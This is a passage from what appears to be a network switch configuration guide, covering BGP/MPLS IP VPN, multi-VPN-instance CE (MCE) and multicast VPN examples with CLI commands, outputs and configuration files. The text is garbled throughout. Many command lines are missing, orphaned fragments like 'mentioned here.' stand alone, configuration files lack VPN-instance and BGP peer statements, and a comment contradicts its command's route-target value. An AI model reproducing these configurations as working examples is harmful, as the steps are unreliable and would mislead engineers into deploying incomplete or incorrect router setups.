[CE1] vlan batch 10
[CE1] interface gigabitethernet 1/0/0
[CE1-GigabitEthernet1/0/0] port link-type trunk
[CE1-GigabitEthernet1/0/0] port trunk allow-pass vlan 10
[CE1-GigabitEthernet1/0/0] quit
[CE1] interface vlanif 10
[CE1-Vlanif10] ip address 10.1.1.1 24
[CE1-Vlanif10] quit
After the configuration is complete, run the display ip vpn-instance verbose command on
the PEs to check the configuration of VPN instances. Each PE can ping its connected CE.

NOTE
If a PE has multiple interfaces bound to the same VPN instance, specify a source IP addresses by setting
-a source-ip-address in the ping -vpn-instance vpn-instance-name -a source-ip-address dest-ip-address
command to ping the a remote CE. If the source IP address is not specified, the ping fails.
PE1 are used as an example.

[PE1] display ip vpn-instance verbose
Total VPN-Instances configured : 2
Total IPv4 VPN-Instances configured : 2
VPN-Instance Name and ID : vpna, 1

Interfaces : Vlanif10
Address family ipv4
Create date : 2014-11-03 02:39:34+00:00
Up time : 0 days, 22 hours, 24 minutes and 53 seconds
Route Distinguisher : 100:1
Export VPN Targets : 111:1
Import VPN Targets : 111:1
Label Policy : label per instance
Per-Instance Label : 4098
Log Interval : 5
VPN-Instance Name and ID : vpnb, 2

Address family ipv4
Create date : 2014-11-03 02:39:34+00:00
Log Interval : 5
[PE1] ping -vpn-instance vpna 10.1.1.1


0.00% packet loss
Step 4 Establish EBGP peer relationships between PEs and CEs and import VPN routes into BGP.
# Configure CE1 connecting to the headquarters R&D area. The configuration on CE2, CE3,
and CE4 is similar to the configuration on CE1 and is not mentioned here.
[CE1] bgp 65410
[CE1-bgp] peer 10.1.1.2 as-number 100
[CE1-bgp] import-route direct
[CE1-bgp] quit
# Configure PE1. The configuration on PE2 is similar to the configuration on PE1 and is not
mentioned here.
[PE1] bgp 100
[PE1-bgp] ipv4-family vpn-instance vpna
[PE1-bgp-vpna] peer 10.1.1.1 as-number 65410
[PE1-bgp-vpna] import-route direct
[PE1-bgp-vpna] quit

[PE1-bgp] ipv4-family vpn-instance vpnb

[PE1-bgp-vpnb] peer 10.2.1.1 as-number 65420
[PE1-bgp-vpnb] import-route direct
[PE1-bgp-vpnb] quit
[PE1-bgp] quit
After the configuration is complete, run the display bgp vpnv4 vpn-instance peer command
on the PEs. The command output shows that BGP peer relationships have been established
between the PEs and CEs.
The peer relationship between PE1 and CE1 is used as an example.
[PE1] display bgp vpnv4 vpn-instance vpna peer

VPN-Instance vpna, Router ID 1.1.1.9:

PrefRcv
10.1.1.1 4 65410 11 9 0 00:07:25 Established

1
Step 5 Establish MP-IBGP peer relationships between PEs.

# Configure PE1.
[PE1] bgp 100
[PE1-bgp] peer 3.3.3.9 as-number 100
[PE1-bgp] peer 3.3.3.9 connect-interface loopback 1
[PE1-bgp] ipv4-family vpnv4
[PE1-bgp-af-vpnv4] peer 3.3.3.9 enable
[PE1-bgp-af-vpnv4] quit
[PE1-bgp] quit
# Configure PE2.
[PE2] bgp 100
[PE2-bgp] quit
After the configuration is complete, run the display bgp peer or display bgp vpnv4 all peer
command on the PEs. The command output shows that BGP peer relationships have been
established between the PEs.
[PE1] display bgp peer

Peer V AS MsgRcvd MsgSent OutQ Up/Down

State PrefRcv
3.3.3.9 4 100 12 6 0 00:02:21

Established 0
[PE1] display bgp vpnv4 all peer


PrefRcv
3.3.3.9 4 100 12 18 0 00:09:38 Established 0

Peer of IPv4-family for vpn instance :

10.1.1.1 4 65410 25 25 0 00:17:57 Established 1
VPN-Instance vpnb, Router ID 1.1.1.9:
10.2.1.1 4 65420 21 22 0 00:17:10 Established 1

Run the display ip routing-table vpn-instance command on the PEs to view the routes to the
remote CEs.
[PE1] display ip routing-table vpn-instance vpna
------------------------------------------------------------------------------
Routing Tables: vpna

10.1.1.0/24 Direct 0 0 D 10.1.1.2 Vlanif10
10.1.1.2/32 Direct 0 0 D 127.0.0.1 Vlanif10
10.3.1.0/24 IBGP 255 0 RD 3.3.3.9 Vlanif30
[PE1] display ip routing-table vpn-instance vpnb
------------------------------------------------------------------------------
Routing Tables: vpnb

10.2.1.0/24 Direct 0 0 D 10.2.1.2 Vlanif20
10.2.1.2/32 Direct 0 0 D 127.0.0.1 Vlanif20
10.4.1.0/24 IBGP 255 0 RD 3.3.3.9 Vlanif30
CEs in the same VPN can ping each other, whereas CEs in different VPNs cannot.
For example, CE1 connecting to the headquarters R&D area can ping CE3 connecting to the
branch R&D area at 10.3.1.1 but cannot ping CE4 connecting to the branch non-R&D area at
10.4.1.1.
[CE1] ping 10.3.1.1
0.00% packet loss
----End
Configuration Files
#
sysname PE1
#
vlan batch 10 20 30
#

ipv4-family
#
ip vpn-instance vpnb
ipv4-family
#
mpls lsr-id 1.1.1.9
mpls
#
mpls ldp
#
interface Vlanif10
ip address 10.1.1.2 255.255.255.0
#
interface Vlanif20
ip binding vpn-instance vpnb
ip address 10.2.1.2 255.255.255.0
#
interface Vlanif30
ip address 172.1.1.1 255.255.255.0
mpls
mpls ldp
#
#
#
#
interface LoopBack1
ip address 1.1.1.9 255.255.255.255
#
bgp 100
peer 3.3.3.9 as-number 100
peer 3.3.3.9 connect-interface LoopBack1
#
ipv4-family unicast
peer 3.3.3.9 enable
#
ipv4-family vpnv4
policy vpn-target
peer 3.3.3.9 enable
#
import-route direct
#
ipv4-family vpn-instance vpnb
import-route direct
#
area 0.0.0.0
network 1.1.1.9 0.0.0.0
network 172.1.1.0 0.0.0.255

#
return
l Configuration file of P
#
sysname P
#
vlan batch 30 60
#
mpls lsr-id 2.2.2.9
mpls
#
mpls ldp
#
interface Vlanif30
ip address 172.1.1.2 255.255.255.0
mpls
mpls ldp
#
interface Vlanif60
ip address 172.2.1.1 255.255.255.0
mpls
mpls ldp
#
#
#
interface LoopBack1
ip address 2.2.2.9 255.255.255.255
#
area 0.0.0.0
network 2.2.2.9 0.0.0.0
network 172.1.1.0 0.0.0.255
network 172.2.1.0 0.0.0.255
#
return
#
sysname PE2
#
vlan batch 40 50 60
#
ipv4-family
#
ipv4-family
#
mpls lsr-id 3.3.3.9
mpls
#
mpls ldp
#
interface Vlanif40
ip address 10.3.1.2 255.255.255.0
#

interface Vlanif50
ip address 10.4.1.2 255.255.255.0
#
interface Vlanif60
ip address 172.2.1.2 255.255.255.0
mpls
mpls ldp
#
#
#
#
interface LoopBack1
ip address 3.3.3.9 255.255.255.255
#
bgp 100
#
ipv4-family unicast
peer 1.1.1.9 enable
#
ipv4-family vpnv4
policy vpn-target
peer 1.1.1.9 enable
#
import-route direct
#
import-route direct
#
area 0.0.0.0
network 3.3.3.9 0.0.0.0
network 172.2.1.0 0.0.0.255
#
return
l Configuration file of CE1 connecting to the headquarters R&D area
#
sysname CE1
#
vlan batch 10
#
interface Vlanif10
ip address 10.1.1.1 255.255.255.0
#
#
bgp 65410
#
ipv4-family unicast
import-route direct


#
return
l Configuration file of CE2 connecting to the headquarters non-R&D area
#
sysname CE2
#
vlan batch 20
#
interface Vlanif20
ip address 10.2.1.1 255.255.255.0
#
#
bgp 65420
#
ipv4-family unicast
import-route direct
#
return
l Configuration file of CE3 connecting to the branch R&D area
#
sysname CE3
#
vlan batch 40
#
interface Vlanif40
ip address 10.3.1.1 255.255.255.0
#
#
bgp 65430
#
ipv4-family unicast
import-route direct
#
return
l Configuration file of CE4 connecting to the branch non-R&D area
#
sysname CE4
#
vlan batch 50
#
interface Vlanif50
ip address 10.4.1.1 255.255.255.0
#
#
bgp 65440
#
ipv4-family unicast
import-route direct

#
return
14.1.2 Example for Configuring an MCE

MCE Overview
A multi-VPN-instance CE (MCE) device can function as a CE device for multiple VPN
instances in BGP/MPLS IP VPN networking. This differs from the traditional BGP/MPLS IP
VPN architecture, where each VPN instance must use a CE device to connect to a PE device.
MCE applies when users on a private network need to be divided into multiple VPNs and
services of users in different VPNs must be completely isolated. Deploying a CE device for
each VPN increases the cost of device procurement and maintenance. If multiple VPNs share
one CE device, data security cannot be ensured because all the VPNs use the same routing
table.
An MCE device creates and maintains an independent VRF for each VPN to ensures data
security between different VPNs while reducing network construction and maintenance costs.
The Multi-VRF application isolates forwarding paths of different VPNs on a private network
and advertises routes of each VPN to the peer PE device, ensuring that VPN packets are
correctly transmitted on the public network.
Configuration Notes
NOTE
The headquarters and branches of a company need to communicate through MPLS VPN, and
two services of the company must be isolated. To reduce hardware costs, the company wants
the branch to connect to the PE through one CE.
As shown in Figure 14-2, the networking requirements are as follows:
l CE1 and CE2 connect to the headquarters. CE1 belongs to vpna, and CE2 belongs to
vpnb.
l The MCE connects to vpna and vpnb of the branch through SwitchA and SwitchB.
Users in the same VPN need to communicate with each other, but users in different VPNs
must be isolated.

Figure 14-2 Networking diagram for configuring an MCE

vpna
GE2/0/0
vpna VLANIF10
CE1 192.168.1.1/24
SwitchA
GE1/0/0 GE1/0/0
VLANIF10 VLANIF60
10.1.1.1/24 10.3.1.1/24
Loopback1
GE1/0/0 2.2.2.9./32 GE3/0/0
VLANIF10 VPN VLANIF60
10.1.1.2/24 Backbone 10.3.1.2/24
MCE
Loopback1 PE1 PE2
1.1.1.9./32 GE3/0/0 GE1/0/0
GE2/0/0 GE1/0/0
GE2/0/0 VLANIF30 VLANIF30 VLANIF100 GE4/0/0
VLANIF100
VLANIF20 172.1.1.1/24 172.1.1.2/24 10.5.1.2/24 VLANIF70
10.5.1.1/24
10.2.1.2/24 VLANIF200 VLANIF200 10.4.1.2/24
10.6.1.1/24 10.6.1.2/24
GE1/0/0 GE1/0/0
VLANIF20 VLANIF70
10.2.1.1/24 10.4.1.1/24
SwitchB
CE2
GE2/0/0
vpnb
VLANIF10
192.168.2.2/24
vpnb
1. Configure OSPF between PEs so that they can communicate and configure MP-IBGP to
exchange VPN routing information.
2. Configure basic MPLS capabilities and MPLS LDP on the PEs to establish LDP LSPs.
3. Create VPN instances vpna and vpnb on the MCE and PEs to isolate services.
4. Establish EBGP peer relationships between PE1 and its connected CEs, and import BGP
routes to the VPN routing table of PE1.
5. Configure routing between the MCE and VPN sites and between the MCE and PE2.
Procedure
Step 1 Configure VLANs on interfaces and assign IP addresses to the VLANIF interfaces and
loopback interfaces according to Figure 14-2.
# Configure PE1. The configuration on PE2, CE1, CE2, MCE, SwitchA and SwitchB is
similar to the configuration on PE1 and is not mentioned here.


[PE1] vlan batch 30
[PE1-Vlanif30] quit
Step 2 Configure OSPF on PEs of the backbone network.

# Configure PE1.
[PE1] ospf
[PE1-ospf-1] area 0
[PE1-ospf-1] quit
# Configure PE2.
[PE2] ospf
[PE2-ospf-1] area 0
[PE2-ospf-1] quit
After the configuration is complete, PEs can obtain Loopback1 address of each other.
------------------------------------------------------------------------------
1.1.1.9/32 OSPF 10 1 D 172.1.1.1 Vlanif30

10.3.1.0/24 Direct 0 0 D 10.3.1.3 Vlanif60
10.3.1.3/32 Direct 0 0 D 127.0.0.1 Vlanif60
10.4.1.0/24 Direct 0 0 D 10.4.1.3 Vlanif70
10.4.1.3/32 Direct 0 0 D 127.0.0.1 Vlanif70
172.1.1.0/24 Direct 0 0 D 172.1.1.2 Vlanif30
172.1.1.2/32 Direct 0 0 D 127.0.0.1 Vlanif30
Step 3 Configure basic MPLS capabilities and MPLS LDP on the PEs to establish LDP LSPs.
mentioned here.

[PE1] mpls
[PE1-mpls] quit
[PE1] mpls ldp
[PE1-mpls-ldp] quit
[PE1-Vlanif30] mpls
[PE1-Vlanif30] quit

After the configuration is complete, run the display mpls ldp session command on the PEs.
The command output shows that the MPLS LDP session between the PEs is in Operational
state.


------------------------------------------------------------------------------
------------------------------------------------------------------------------
------------------------------------------------------------------------------
Step 4 Configure VPN instances on the PEs. On PE1, bind the interfaces connected to CE1 and CE2
to the VPN instances respectively. On PE2, bind the interface connected to the MCE to the
VPN instances.
# Configure PE1.
[PE1-vpn-instance-vpna] ipv4-family
[PE1-vpn-instance-vpna-af-ipv4] route-distinguisher 100:1 //Set the RD to 100:1.
[PE1-vpn-instance-vpna-af-ipv4] vpn-target 111:1 both //Add the RT value
100:1 to routes exported from the VPN instance vpna to MP-BGP. Only the routes
with the RT value 100:1 can be imported to vpna.
[PE1-vpn-instance-vpnb] ipv4-family
[PE1-vpn-instance-vpnb-af-ipv4] route-distinguisher 100:2
[PE1-Vlanif10] ip binding vpn-instance vpna //Bind the interface to vpna.
[PE1-Vlanif10] quit
[PE1-Vlanif20] quit
# Configure PE2.
[PE2-GigabitEthernet2/0/0] port trunk allow-pass vlan 60 70
[PE2-vpn-instance-vpna] ipv4-family
[PE2-vpn-instance-vpna-af-ipv4] route-distinguisher 200:1

[PE2-vpn-instance-vpnb] ipv4-family
[PE2-vpn-instance-vpnb-af-ipv4] route-distinguisher 200:2
[PE2-Vlanif60] quit
[PE2-Vlanif70] quit
Step 5 Configure VPN instances on the MCE and bind the interfaces connected to SwitchA and
SwitchB to the VPN instances respectively.
[HUAWEI] sysname MCE
[MCE] vlan batch 60 70
[MCE] interface gigabitethernet 1/0/0
[MCE-GigabitEthernet1/0/0] port link-type trunk
[MCE-GigabitEthernet1/0/0] port trunk allow-pass vlan 60 70
[MCE-GigabitEthernet1/0/0] quit
[MCE-GigabitEthernet3/0/0] port trunk allow-pass vlan 60
[MCE-GigabitEthernet4/0/0] port trunk allow-pass vlan 70
[MCE] ip vpn-instance vpna
[MCE-vpn-instance-vpna] ipv4-family
[MCE-vpn-instance-vpna-af-ipv4] route-distinguisher 100:1
[MCE-vpn-instance-vpna-af-ipv4] quit
[MCE-vpn-instance-vpna] quit
[MCE] ip vpn-instance vpnb
[MCE-vpn-instance-vpnb] ipv4-family
[MCE-vpn-instance-vpnb-af-ipv4] route-distinguisher 100:2
[MCE-vpn-instance-vpnb-af-ipv4] quit
[MCE-vpn-instance-vpnb] quit
[MCE] interface vlanif 60
[MCE-Vlanif60] ip binding vpn-instance vpna
[MCE-Vlanif60] ip address 10.3.1.2 24
[MCE-Vlanif60] quit
[MCE] interface vlanif 70
[MCE-Vlanif70] ip binding vpn-instance vpnb
[MCE-Vlanif70] ip address 10.4.1.2 24
[MCE-Vlanif70] quit
Step 6 Establish an MP-IBGP peer relationship between PEs. Establish an EBGP peer relationship
between PE1 and CE1, and between PE1 and CE2.
# Configure CE1. The configuration on CE2 is similar to the configuration on CE1 and is not
mentioned here.
[CE1] bgp 65410
[CE1-bgp] peer 10.1.1.2 as-number 100 //Establish an EBGP peer relationship
between PE1 and CE1 and import VPN routes.
[CE1-bgp] quit
mentioned here.
[PE1] bgp 100


[PE1-bgp-vpna] quit
[PE1-bgp-vpnb] quit
[PE1-bgp] quit
Set up an MP-IBGP peer relationship between the PE devices.

mentioned here.
[PE1] bgp 100
[PE1-bgp] quit
After the configuration is complete, run the display bgp vpnv4 all peer command on PE1.
The command output shows that PE1 has established an IBGP peer relationship with PE2 and
EBGP peer relationships with CE1 and CE2. The peer relationships are in Established state.
[PE1] display bgp vpnv4 all peer

Peer V AS MsgRcvd MsgSent OutQ Up/Down State PrefRcv
2.2.2.9 4 100 288 287 0 01:19:16 Established 6
Peer of IPv4-family for vpn instance :

10.1.1.1 4 65410 9 11 0 00:01:38 Established
2
VPN-Instance vpnb, Router ID 1.1.1.9:

10.2.1.1 4 65420 9 12 0 00:04:09 Established 2
Step 7 Configure routing between the MCE and VPN sites.

The MCE directly connects to vpna, and no routing protocol is used in vpna. Configure static
routes to implement communication between the MCE and vpna.
l # Configure SwitchA.
Assign IP address 192.168.1.1/24 to the interface connected to vpna. The configuration
details are not mentioned here.
[SwitchA] ip route-static 0.0.0.0 0.0.0.0 10.3.1.2 //Create a default route
destined to the MCE for SwitchA.
l # Configure the MCE.

[MCE] ip route-static vpn-instance vpna 192.168.1.0 24 10.3.1.1 //Create a

VPN route destined to SwitchA for the VPN instance vpna.
l # Check the routes of vpna on the MCE.

[MCE] display ip routing-table vpn-instance vpna
Route Flags: R - relay, D - download to
fib
------------------------------------------------------------------------------
Routing Tables:
vpna
Destinations : 3 Routes :
3

Interface
10.3.1.0/24 Direct 0 0 D 10.3.1.2

Vlanif60
10.3.1.2/32 Direct 0 0 D 127.0.0.1
Vlanif60
192.168.1.0/24 Static 60 0 RD 10.3.1.1
Vlanif60
The preceding information shows that the MCE has a static route to vpna.
The RIP protocol runs in vpnb. Configure RIP process 200 on the MCE and bind it to vpnb so
that routes learned by RIP are added to the routing table of vpnb.
l # Configure the MCE.

[MCE] rip 200 vpn-instance vpnb
[MCE-rip-200] version 2
[MCE-rip-200] network 10.0.0.0
[MCE-rip-200] import-route ospf 200 //Import OSPF routes so that SwitchB
can learn routes to the MCE.
[MCE-rip-200] quit
l # Configure SwitchB.
Assign IP address 192.168.2.1/24 to the interface connected to vpnb. The configuration
is not provided here.
[SwitchB] rip 200
[SwitchB-rip-200] version 2
[SwitchB-rip-200] network 10.0.0.0
[SwitchB-rip-200] network 192.168.2.0
[SwitchB-rip-200] quit
l # Check the routes of vpnb on the MCE.

[MCE] display ip routing-table vpn-instance vpnb
Route Flags: R - relay, D - download to
fib
------------------------------------------------------------------------------
Routing Tables:
vpnb
Destinations : 3 Routes :


Interface
10.4.1.0/24 Direct 0 0 D 10.4.1.2

Vlanif70
10.4.1.2/32 Direct 0 0 D 127.0.0.1
Vlanif70
192.168.2.0/24 RIP 100 1 D 10.4.1.1
Vlanif70
The preceding information shows that the MCE has learned the route to vpnb using RIP.
The route to vpnb and the route to vpna (192.168.1.0) are maintained in different VPN
routing tables so that users in the two VPNs are isolated from each other.
Step 8 Configure OSPF multi-instance between the MCE and PE2.
# Configure PE2.
NOTE
To configure OSPF multi-instance between the MCE and PE2, complete the following tasks on PE2:
l In the OSPF view, import BGP routes and advertise VPN routes of PE1 to the MCE.
l In the BGP view, import routes of the OSPF processes and advertise the VPN routes of the MCE
to PE1.
[PE2] ospf 100 vpn-instance vpna
[PE2-ospf-100] import-route bgp //Import BGP routes to OSPF 100 in vpna between
the PE and MCE, so that the MCE learns routes to CE1.
[PE2-ospf-100] area 0
[PE2-ospf-100] quit
[PE2] ospf 200 vpn-instance vpnb
[PE2-ospf-200] import-route bgp //Import BGP routes to OSPF 200 in vpnb between
the PE and MCE, so that the MCE learns routes to CE2.
[PE2-ospf-200] area 0
[PE2-ospf-200] quit
[PE2] bgp 100
[PE2-bgp-vpna] import-route ospf 100 //Import OSPF 100 to BGP so that PE2 adds
the VPNv4 prefix to routes and uses MP-iBGP to advertise routes to PE1.
[PE2-bgp-vpna] quit
[PE2-bgp-vpnb] import-route ospf 200 //Import OSPF 200 to BGP so that PE2 adds
the VPNv4 prefix to routes and uses MP-iBGP to advertise routes to PE1.
[PE2-bgp-vpnb] quit
# Configure the MCE.

NOTE
Import VPN routes to the OSPF processes.

[MCE] ospf 100 vpn-instance vpna //Configure dynamic OSPF routes for
the VPN instance vpna.
[MCE-ospf-100] import-route static //Import static private routes of
SwitchA to the MCE.
[MCE-ospf-100] vpn-instance-capability simple //Disable loop detection for OSPF
VPN, so that the MCE can learn routes re-advertised from PE2.
[MCE-ospf-100] area 0
[MCE-ospf-100-area-0.0.0.0] network 10.3.1.0 0.0.0.255
[MCE-ospf-100-area-0.0.0.0] quit
[MCE-ospf-100] quit
[MCE] ospf 200 vpn-instance vpnb

[MCE-ospf-200] import-route rip 200

[MCE-ospf-200] vpn-instance-capability simple
[MCE-ospf-200] area 0
[MCE-ospf-200-area-0.0.0.0] network 10.4.1.0 0.0.0.255
[MCE-ospf-200-area-0.0.0.0] quit
[MCE-ospf-200] quit
After the configuration is complete, run the display ip routing-table vpn-instance command
on the MCE to view the routes to the remote CEs.
The VPN instance vpna is used as an example.

[MCE] display ip routing-table vpn-instance vpna
------------------------------------------------------------------------------
10.1.1.0/24 O_ASE 150 1 D 10.3.1.3 Vlanif60

10.3.1.0/24 Direct 0 0 D 10.3.1.2 Vlanif60
10.3.1.2/32 Direct 0 0 D 127.0.0.1 Vlanif60
192.168.1.0/24 Static 60 0 RD 10.3.1.1 Vlanif60
Run the display ip routing-table vpn-instance command on the PEs to view the routes to the
remote CEs.
The VPN instance vpna on PE1 is used as an example.

------------------------------------------------------------------------------
10.1.1.0/24 Direct 0 0 D 10.1.1.2 Vlanif10

10.1.1.2/32 Direct 0 0 D 127.0.0.1 Vlanif10
10.3.1.0/24 IBGP 255 0 RD 2.2.2.9 Vlanif30
192.168.1.0/24 IBGP 255 2 RD 2.2.2.9 Vlanif30
CE1 and SwitchA can communicate with each other. CE2 and SwitchB can communicate
with each other.
The information displayed on CE1 is used as an example.

[CE1] ping 10.3.1.1

0.00% packet loss
CE1 cannot ping CE2 or SwitchB. SwitchA cannot ping CE2 or SwitchB.
The ping from CE1 to SwitchB is used as an example.

[CE1] ping 10.4.1.1

Request time out
Request time out
Request time out
Request time out
Request time out

100.00% packet loss
----End
Configuration Files
#
sysname CE1
#
vlan batch 10
#
interface Vlanif10
ip address 10.1.1.1 255.255.255.0
#
#
bgp 65410
#
ipv4-family unicast
import-route direct
#
return

#
sysname CE2
#
vlan batch 20
#
interface Vlanif20
ip address 10.2.1.1 255.255.255.0
#
#
bgp 65420
#
ipv4-family unicast
import-route direct
#
return

#
sysname PE1
#
vlan batch 10 20 30

#
ipv4-family
#
ipv4-family
#
mpls lsr-id 1.1.1.9
mpls
#
mpls ldp
#
interface Vlanif10
ip address 10.1.1.2 255.255.255.0
#
interface Vlanif20
ip address 10.2.1.2 255.255.255.0
#
interface Vlanif30
ip address 172.1.1.1 255.255.255.0
mpls
mpls ldp
#
#
#
#
interface LoopBack1
ip address 1.1.1.9 255.255.255.255
#
bgp 100
#
ipv4-family unicast
peer 2.2.2.9 enable
#
ipv4-family vpnv4
policy vpn-target
peer 2.2.2.9 enable
#
import-route direct
#
import-route direct
#
ospf 1
area 0.0.0.0
network 1.1.1.9 0.0.0.0

network 172.1.1.0 0.0.0.255

#
return
#
sysname PE2
#
vlan batch 30 60 70
#
ipv4-family
#
ipv4-family
#
mpls lsr-id 2.2.2.9
mpls
#
mpls ldp
#
interface Vlanif30
ip address 172.1.1.2 255.255.255.0
mpls
mpls ldp
#
interface Vlanif60
ip address 10.3.1.3 255.255.255.0
#
interface Vlanif70
ip address 10.4.1.3 255.255.255.0
#
interface LoopBack1
ip address 2.2.2.9 255.255.255.255
#
#
#
bgp 100
#
ipv4-family unicast
peer 1.1.1.9 enable
#
ipv4-family vpnv4
policy vpn-target
peer 1.1.1.9 enable
#
import-route ospf 100
#
#
ospf 1

area 0.0.0.0
network 2.2.2.9 0.0.0.0
network 172.1.1.0 0.0.0.255
#
ospf 100 vpn-instance vpna
import-route bgp
area 0.0.0.0
network 10.3.1.0 0.0.0.255
#
ospf 200 vpn-instance vpnb
import-route bgp
area 0.0.0.0
network 10.4.1.0 0.0.0.255
#
return
l Configuration file of the MCE
#
sysname MCE
#
vlan batch 60 70
#
ipv4-family
#
ipv4-family
#
interface Vlanif60
ip address 10.3.1.2 255.255.255.0
#
interface Vlanif70
ip address 10.4.1.2 255.255.255.0
#
#
#
#
ospf 100 vpn-instance vpna
import-route static
vpn-instance-capability simple
area 0.0.0.0
network 10.3.1.0 0.0.0.255
#
ospf 200 vpn-instance vpnb
import-route rip 200
area 0.0.0.0
network 10.4.1.0 0.0.0.255
#
rip 200 vpn-instance vpnb
version 2
network 10.0.0.0
#
ip route-static vpn-instance vpna 192.168.1.0 255.255.255.0 10.3.1.1
#
return


#
sysname SwitchA
#
vlan batch 60
#
interface Vlanif60
ip address 10.3.1.1 255.255.255.0
#
#
ip route-static 0.0.0.0 0.0.0.0 10.3.1.2
#
return

#
sysname SwitchB
#
vlan batch 70
#
interface Vlanif70
ip address 10.4.1.1 255.255.255.0
#
#
rip 200
version 2
network 10.0.0.0
network 192.168.2.0
#
return
14.1.3 Example for Configuring Multicast VPN Access Through

MCE Devices
Multicast VPN Overview

Multicast VPN technology allows multicast services to run on BGP/MPLS IP VPN networks.
This technology encapsulates multicast packets from a private network to enable the packets
to be forwarded along the multicast distribution tree (MDT) on a public network. When the
packets reach the destination network, they are decapsulated and forwarded to receivers as
multicast packets of the private network.
Multicast VPN is used to address the following problems occurring during the multicast
service deployment on BGP/MPLS IP VPN networks:
l VPN multicast packets cannot pass the reverse path forwarding (RPF) check on the
public network.
In multicast forwarding, multicast routers perform RPF checks on multicast packets
based on the multicast source address and inbound interface. Only multicast packets
from the RPF interface are forwarded. Each router needs to know the unicast route to the
multicast source. The provider (P) device on a BGP/MPLS IP VPN network does not
know the VPN routes; therefore, RPF checks fail on the P device.
l Overlapping multicast source addresses or group addresses on VPNs lead to inter-VPN
communication.

A BGP/MPLS IP VPN network allows overlapping addresses in sites on each VPN;

therefore, the multicast source addresses or group addresses of different VPNs may
overlap. A PE device must correctly forward multicast packets from a VPN to only the
users at the sites on the same VPN to prevent communication between different VPNs.
l VPN packets are forwarded in unicast mode on the public network. When the multicast
traffic volume is high, loads on the public network increase greatly.
Multicast technology ensures that each link transmits only one copy of multicast packets.
Each device replicates multicast data according to the number of outbound interfaces,
and the bandwidth consumed does not increase with the number of receivers. If the
public network supports multicast forwarding, multicast packets are replicated only at
bifurcation points on the public network. This on-demand replication mechanism reduces
loads on the public network and conserves bandwidth.
l All PE devices on a VPN can receive multicast packets from a multicast source on the
same VPN. When the multicast traffic volume is high, loads on the PE devices increase
greatly.
A VPN is composed of multiple sites, each of which connects to a different PE. Some
sites may not have receivers. If VPN multicast data is forwarded only to the PE devices
with receivers connected, burdens on PE devices are reduced.
Configuration Notes
l If multicast VPN in multicast domain (MD) mode is used on switches, the PIM-SM SSM
model cannot be used on the public network.
l Multicast VPN cannot be deployed on inter-AS BGP/MPLS IPv4 VPN networks.
l Multicast VPN cannot be deployed on BGP/MPLS IPv6 VPN networks.
l Interfaces on the following interface cards cannot be configured as member interfaces of
Eth-Trunk multicast loopback interfaces: X1E series interface cards.
As shown in Figure 14-3, a company deploys two services, data of which is transmitted in
multicast mode. The VPN site blue using service A and the VPN site white using service B
both connect to the backbone network through the MCE devices. Multicast VPN in MD mode
can be deployed to meet the multicast service requirements of the company. This
configuration can isolate data of different services and reduces multicast traffic loads on the
public network.

Figure 14-3 Multicast VPN access through MCE devices

Source1
VPN Blue
GE2/0/1
VLANIF101 CE1
192.168.11.1/24
GE1/0/1
VLANIF100
192.168.1.2/24
Source2 192.168.12.1/24
VLANIF201 192.168.1.1/24
GE2/0/1 VLANIF100
CE2 192.168.2.1/24 GE1/0/1
VLANIF200
VPN White GE1/0/2 GE1/0/2 MCE1
VLANIF200
192.168.2.2/24 GE1/0/0
VLANIF20 VLANIF10
10.1.2.2/24 10.1.1.2/24
BGP/MPLS VPN Backbone

10.1.2.1/24 10.1.1.1/24
VLANIF20 VLANIF10
PE2 10.1.4.2/24 10.1.4.1/24 P 10.1.3.2/24 GE1/0/0
VLANIF40 VLANIF40 VLANIF30
3.3.3.3/32 GE3/0/0 GE3/0/0 GE2/0/0 1.1.1.1/32
Loopback0 Loopback0
GE2/0/0
VLANIF30
GE1/0/0 10.1.3.1/24 PE1
VLANIF50 VLANIF60 Loopback0
10.1.5.1/24 10.1.6.1/24 2.2.2.2/32
10.1.5.2/24 10.1.6.2/24
VLANIF50 VLANIF60
GE1/0/0 192.168.4.2/24
GE1/0/2 VLANIF400
MCE2 VPN White
VLANIF400 GE1/0/2
GE1/0/1 192.168.4.1/24 CE4 GE2/0/1
VLANIF300 VLANIF401
192.168.3.1/24 192.168.14.1/24
192.168.3.2/24 HostB
VLANIF300
GE1/0/1
192.168.13.1/24
CE3 VLANIF301
GE2/0/1
VPN Blue
HostA
1. Configure BGP/MPLS IP VPN to ensure connectivity of the VPN network.

2. Configure multicast loopback interfaces, share-group addresses, and multicast tunnel
interfaces (MTIs) for VPN instances on the PE devices to implement multicast VPN in
MD mode.

3. Enable multicast routing and PIM on all the devices. Configure the multicast function in
the public network between the PE and P devices. Configure the multicast function in the
VPN instances between PE and MCE devices, and between the MCE and CE devices.
Procedure
Step 1 Configure BGP/MPLS IP VPN.
1. Configure the Open Shortest Path First (OSPF) protocol on the backbone network to
allow communication between the provider edge devices (PE1 and PE2) and
intermediate device P.
# Configure PE1.
<PE1> system-view
[PE1] interface loopback 0 //Create a loopback interface.
[PE1] router id 1.1.1.1 //Set the router ID of PE1 to 1.1.1.1 for route
management.
[PE1] vlan batch 30
[PE1-GigabitEthernet2/0/0] port link-type trunk //Set the link type of
the interface to trunk, which is not the default link type.
[PE1] interface vlanif 30 //Create a VLANIF interface.
[PE1-Vlanif30] quit
[PE1] ospf
[PE1-ospf-1] area 0
[PE1-ospf-1-area-0.0.0.0] network 10.1.3.0 0.0.0.255 //Specify that the
interface running OSPF is the one connected to the 10.1.3.0 network segment
and that the interface belongs to Area 0.
[PE1-ospf-1] quit
The configurations on P and PE2 are similar to the configuration of PE1, and are not
mentioned here.
After the configuration is complete, OSPF neighbor relationships can be set up between
PE1, P, and PE2. Run the display ospf peer command on PE1, P, and PE2, and you can
see that the neighbors are in Full state. Run the display ip routing-table command, and
you can see that PE devices have learned the routes to Loopback0 of each other.
2. Enable basic MPLS capabilities and MPLS LDP on the provider edge devices PE1 and
PE2 to set up LDP LSPs on the MPLS backbone network.
# Configure PE1.
[PE1] mpls lsr-id 1.1.1.1 //Set the LSR ID of PE1 to 1.1.1.1.
[PE1] mpls //Enable MPLS globally.
[PE1-mpls] quit
[PE1] mpls ldp //Enable MPLS LDP globally.
[PE1-mpls-ldp] quit
[PE1-Vlanif30] mpls //Enable MPLS on the VLANIF interface.
[PE1-Vlanif30] mpls ldp //Enable MPLS LDP on the VLANIF interface.
[PE1-Vlanif30] quit
The configurations on P and PE2 are similar to the configuration of PE1, and are not
mentioned here.

After the configuration is complete, LDP sessions can be set up between PE1 and P and
between P and PE2. Run the display mpls ldp session command on the PE and P
devices, and you can see that LDP session is in Operational state.
